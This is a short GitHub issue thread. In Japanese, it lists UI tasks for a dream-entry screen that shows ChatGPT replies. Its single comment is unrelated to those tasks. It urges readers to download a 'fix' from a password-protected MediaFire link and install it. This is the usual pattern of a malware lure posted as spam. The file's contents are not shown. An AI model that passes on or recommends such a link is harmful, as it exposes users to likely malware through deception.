### ISSUE TITLE
【UI】夢の入力画面のUI

### ISSUE THREAD

**Issue by araund2001** [oiM-o/DreamARchive#13]
- [x] テキストフィールドの位置の変更
- [ ] 自分が送信した文章を表示させない
- [ ] chatgptが返信した文章をテキストフィールドの下に表示する

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
